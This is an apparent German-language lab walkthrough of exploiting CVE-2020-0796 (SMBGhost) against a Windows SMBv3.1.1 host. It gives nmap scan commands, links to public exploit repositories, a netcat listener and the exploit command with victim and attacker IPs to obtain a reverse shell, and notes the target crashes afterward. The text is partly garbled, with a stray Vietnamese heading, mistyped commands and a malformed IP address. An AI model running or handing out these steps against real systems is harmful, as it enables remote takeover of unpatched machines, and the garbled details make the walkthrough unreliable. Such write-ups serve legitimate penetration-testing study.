
Proof-of-Concept-Exploit für CVE-2020-0796 (SMBGhost) für Windows 10/Server SMBv3.1.1. Beinhaltet Nmap-Aufklärung, Schwachstellenscan und Zustellung von Reverse-Shell-Payloads.
**- Các phiên bản bị ảnh hưởng*

Nmap starten, um das Netzwerk in der DMZ zu scannen
map -sS 192.168.116.0/24
nmap: Der Name des Netzwerkscanners.**
-sS: Wählt die TCP-SYN-Scan-Methode. Bei diesem Scan sendet Nmap ein SYN-Paket an den Zielrechner und beobachtet die Antwort. Wenn der Zielrechner mit einem SYN-ACK-Paket antwortet, weiß Nmap, dass der Port offen ist. Wenn der Zielrechner mit einem RST-Paket antwortet, ist der Port geschlossen.
-192.168.116.0/24: Die IP-Adresse oder der IP-Adressbereich, den Sie scannen möchten. In diesem Fall handelt es sich um den Bereich 192.168.116.0/24, der alle IP-Adressen von 192.168.116.1 bis 192.168.116.254 beschreibt.

=> Es wird beobachtet, dass die IP-Adresse des Opferrechners 192.116.145 Port 445 offen hat.
· Verwenden von Nmap, um die Schwachstelle auf dem Opferrechner zu scannen
map -p445 –script smb-protocols 192.168.116.145
nmap: Der Name des Netzwerkscanners.
-p445: Gibt den zu scannenden Port an, in diesem Fall Port 445. Port 445 wird normalerweise für die Kommunikation mit dem SMB-Dienst (Server Message Block) auf Windows-Systemen verwendet.
--script smb-protocols: Wählt das Skript smb-protocols für den Scan aus. Dieses Skript hilft, Informationen über die unterstützten SMB-Protokollversionen auf dem Zielrechner zu überprüfen und anzuzeigen.
192.168.116.145: Die IP-Adresse des Zielrechners, den Sie scannen möchten. In diesem Fall ist die IP-Adresse 192.168.116.145.

Das Ergebnis smb-protocols zeigt, dass der Opferrechner möglicherweise die ausnutzbare Schwachstelle SMBv3.1.1 aufweist.
Um sicherzugehen, wird die Ausnutzbarkeit von CVE-2020-0796 durch Ausführen eines Python-Skripts weiter überprüft.
[]: -https://github.com/ly4k/SMBGhost "Exploit-Code"

=> Ergebnis Anfällig -> Schwachstelle CVE-2020-0796 auf dem Opferrechner festgestellt, die ausnutzbar ist.
Durchführung des Reverse-Shell-Angriffs
ncat -lvp 4444
[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "Exploit-Code"
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

=> ERGEBNIS: Der Angreifer übernimmt die Ausführung von Shellcode auf dem Opferrechner.

Nach erfolgreicher Verbindung kann der Angreifer beliebigen Code auf dem Opferrechner mit den Benutzerrechten des Benutzers in der Sitzung ausführen.
Beim Beenden der Sitzung. Der Opferrechner zeigt einen BlueScreen und startet automatisch neu.

*Die Durchführung des Exploits kann zur Beschädigung des Zielsystems führen*